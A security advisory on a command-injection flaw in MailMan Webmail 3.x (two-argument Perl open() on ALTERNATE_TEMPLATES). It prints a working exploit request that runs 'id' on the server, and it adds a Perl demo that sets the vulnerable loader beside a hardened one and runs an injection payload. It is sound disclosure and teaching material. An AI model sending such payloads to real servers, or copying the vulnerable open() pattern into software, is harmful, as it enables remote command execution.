Vulnerability: MailMan

Affected: All 3.x versions of MailMan Webmail below 3.0.26

Description:

The following is based on Secure Reality advisory SRADV00005.

MailMan is a product by Endymion Corporation that provides a web-based interface to email via POP3 and SMTP. MailMan is very popular due to its easy setup and operation. MailMan is written as a Perl CGI script; the version shipped to customers is obfuscated in an attempt to prevent piracy.

The code contains several insecure calls to open() containing user-specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user, which in most cases is 'nobody'.

MailMan uses template files to define the appearance of its output so that customers can brand the software for their particular service (e.g. ISP, educational institution). In previous versions of MailMan the location of the template files was static. Version 3 added the ability to have multiple sets of template files. The location of the template files is defined by a form variable called 'ALTERNATE_TEMPLATES'. When opening the alternate templates, MailMan fails to pass the '<' mode to the infamous two-argument Perl open() and executes an open that looks like the following:

open("$ALTERNATE_TEMPLATES_<action>.html");

where <action> is a defined template name. Since we control the $ALTERNATE_TEMPLATES variable, we can easily use pipe redirection to execute commands on the remote server: a leading '|' makes Perl start a shell and pipe to the command, and the command's stdout is the CGI script's stdout, so whatever the command prints goes straight back to the browser. That is why the payload below prints its own Content-Type header before the command output. The trailing NUL (%00) truncates the string, so the '_<action>.html' suffix never reaches the shell.

The following request will execute "id" on a vulnerable remote web server and return the output to the browser:

/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00

Please note that if $mailman::strLocalTemplateLocation is defined in the configuration section at the top of the script (it is commented out by default and is rarely enabled), this attack will fail, since we would no longer be able to affect the beginning of the open string.

Solution:

Please upgrade to the latest version of MailMan (3.0.26) at http://www.endymion.com/products/mailman/download.htm
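The open() pattern described above, reproduced as an added example (this is not MailMan's code, which is obfuscated and not shown here, nor Secure Reality's). The vulnerable loader builds the path the way the advisory describes and hands it to two-argument open(), so the form variable chooses the mode; the hardened loader passes an explicit '<' mode, restricts the template-set name to a whitelist, and anchors it under a fixed directory. The template directory, the file name 'isp_login.html', the function names and the sample inputs are all assumptions constructed for the demo. One deliberate difference from the advisory's payload: instead of a %00 to cut off the '_<action>.html' suffix, the constructed payload ends in '#', so the suffix becomes a shell comment; the injection works the same way.

```perl
#!/usr/bin/perl
# Added example: the MailMan-style two-argument open() next to a hardened version.
# Not MailMan's own code; paths, names and inputs below are assumed/constructed.
use strict;
use warnings;
use File::Temp qw(tempdir);

$| = 1;   # unbuffered stdout so our prints and the child's output stay in order

# Constructed template set: a throwaway directory with one template file.
my $TEMPLATE_BASE = tempdir(CLEANUP => 1);
open(my $t, '>', "$TEMPLATE_BASE/isp_login.html") or die "setup: $!";
print $t "<html>constructed login template</html>\n";
close $t;

# Vulnerable pattern (what the advisory describes): the mode comes from the data.
# A leading '|' makes Perl spawn a shell and pipe TO the command; the command's
# stdout is our stdout, i.e. the HTTP response when this runs as a CGI script.
sub load_template_vulnerable {
    my ($alt, $action) = @_;
    my $path = "${alt}_${action}.html";
    open(my $fh, $path) or return undef;    # two-argument open: BAD
    local $/;                               # slurp mode
    my $body = <$fh>;                       # undef for a pipe (write-only handle)
    close $fh;                              # waits for the shell to finish
    return $body;
}

# Hardened pattern: explicit read mode, whitelisted names, fixed base directory.
sub load_template_safe {
    my ($alt, $action) = @_;
    return undef unless defined $alt    && $alt    =~ /\A[A-Za-z0-9_-]{1,32}\z/;
    return undef unless defined $action && $action =~ /\A[A-Za-z0-9_-]{1,32}\z/;
    my $path = "$TEMPLATE_BASE/${alt}_${action}.html";
    open(my $fh, '<', $path) or return undef;   # three-argument open: mode fixed
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed inputs: a legitimate template-set name and the injection.
my $benign = 'isp';
my $attack = '| echo "Content-Type: text/html"; echo ""; id #';

print "--- vulnerable loader, benign input ---\n";
print load_template_vulnerable("$TEMPLATE_BASE/$benign", 'login') // "(open failed)\n";

print "--- vulnerable loader, attacker input (shell runs id) ---\n";
load_template_vulnerable($attack, 'login');

print "--- hardened loader, benign input ---\n";
print load_template_safe($benign, 'login') // "(open failed)\n";

print "--- hardened loader, attacker input ---\n";
print defined load_template_safe($attack, 'login') ? "opened\n" : "rejected\n";
```

Run it with a recent Perl: the second section prints the fake HTTP header followed by the output of id, exactly as the advisory's request would in a browser, and Perl also warns that the filehandle was opened only for output, which is itself a sign that the "filename" became a pipe. The hardened loader rejects the payload before open() is reached; even without the whitelist, the explicit '<' mode would make Perl look for a file literally named with the pipe and fail, rather than spawn a shell.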